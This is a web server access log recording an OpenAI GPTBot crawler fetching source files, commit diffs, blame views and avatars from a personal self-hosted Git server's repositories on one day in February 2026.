"/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts" +[17/Feb/2026:13:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore" +[17/Feb/2026:13:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md" +[17/Feb/2026:13:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json" [Client 74.7.227.38] [Length 11075] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" +[17/Feb/2026:13:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11237] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts" +[17/Feb/2026:13:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11882] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" +[17/Feb/2026:13:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets" +[17/Feb/2026:13:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11299] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" +[17/Feb/2026:13:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx" +[17/Feb/2026:13:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf" +[17/Feb/2026:13:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" +[17/Feb/2026:13:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12976] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" +[17/Feb/2026:13:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 18051] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" +[17/Feb/2026:13:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 174877] [Gzip 16.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" +[17/Feb/2026:13:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json" +[17/Feb/2026:13:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json" [Client 74.7.227.38] [Length 10023] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json" +[17/Feb/2026:13:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json" +[17/Feb/2026:13:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11211] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json" +[17/Feb/2026:13:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10381] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json" +[17/Feb/2026:13:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json" +[17/Feb/2026:13:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 18057] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" +[17/Feb/2026:13:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 19863] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" +[17/Feb/2026:13:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 15481] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" +[17/Feb/2026:13:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 15480] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" +[17/Feb/2026:13:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 174831] [Gzip 16.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" +[17/Feb/2026:13:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=40" [Client 74.7.227.38] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" +[17/Feb/2026:13:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 74.7.227.38] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" +[17/Feb/2026:13:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=512" [Client 74.7.227.38] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" +[17/Feb/2026:13:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 74.7.227.38] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:13:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=96" [Client 74.7.227.38] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/watchers" +[17/Feb/2026:13:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 150413] [Gzip 17.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=split&whitespace=ignore-change" +[17/Feb/2026:13:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 150372] [Gzip 17.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:13:28:37 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" +[17/Feb/2026:13:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py" [Client 74.7.227.38] [Length 12952] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6" +[17/Feb/2026:13:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py" [Client 74.7.227.38] [Length 16073] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py" [Client 74.7.227.38] [Length 12952] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" +[17/Feb/2026:13:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py" [Client 74.7.227.38] [Length 16074] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6" +[17/Feb/2026:13:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py" [Client 74.7.227.38] [Length 12952] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?tab=activity" [Client 74.7.227.38] [Length 10037] [Gzip 5.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" +[17/Feb/2026:13:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10279] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:13:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx" [Client 74.7.227.38] [Length 13920] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" +[17/Feb/2026:13:28:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/" [Client 74.7.227.38] [Length 46] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" +[17/Feb/2026:13:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 74.7.227.38] [Length 17170] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/" +[17/Feb/2026:13:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23927] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" +[17/Feb/2026:13:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13903] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" +[17/Feb/2026:13:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py" +[17/Feb/2026:13:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py" [Client 74.7.227.38] [Length 10143] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py" +[17/Feb/2026:13:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py" +[17/Feb/2026:13:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py" [Client 74.7.227.38] [Length 10143] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py" +[17/Feb/2026:13:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py" +[17/Feb/2026:13:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 74.7.227.38] [Length 387798] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer?tab=activity" +[17/Feb/2026:13:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f" [Client 74.7.227.38] [Length 17005] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer?tab=activity" +[17/Feb/2026:13:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx" +[17/Feb/2026:13:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb" [Client 74.7.227.38] [Length 211400] [Gzip 13.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer?tab=activity" +[17/Feb/2026:13:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71402] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md" +[17/Feb/2026:13:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx" [Client 74.7.227.38] [Length 13787] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx" +[17/Feb/2026:13:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15175] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 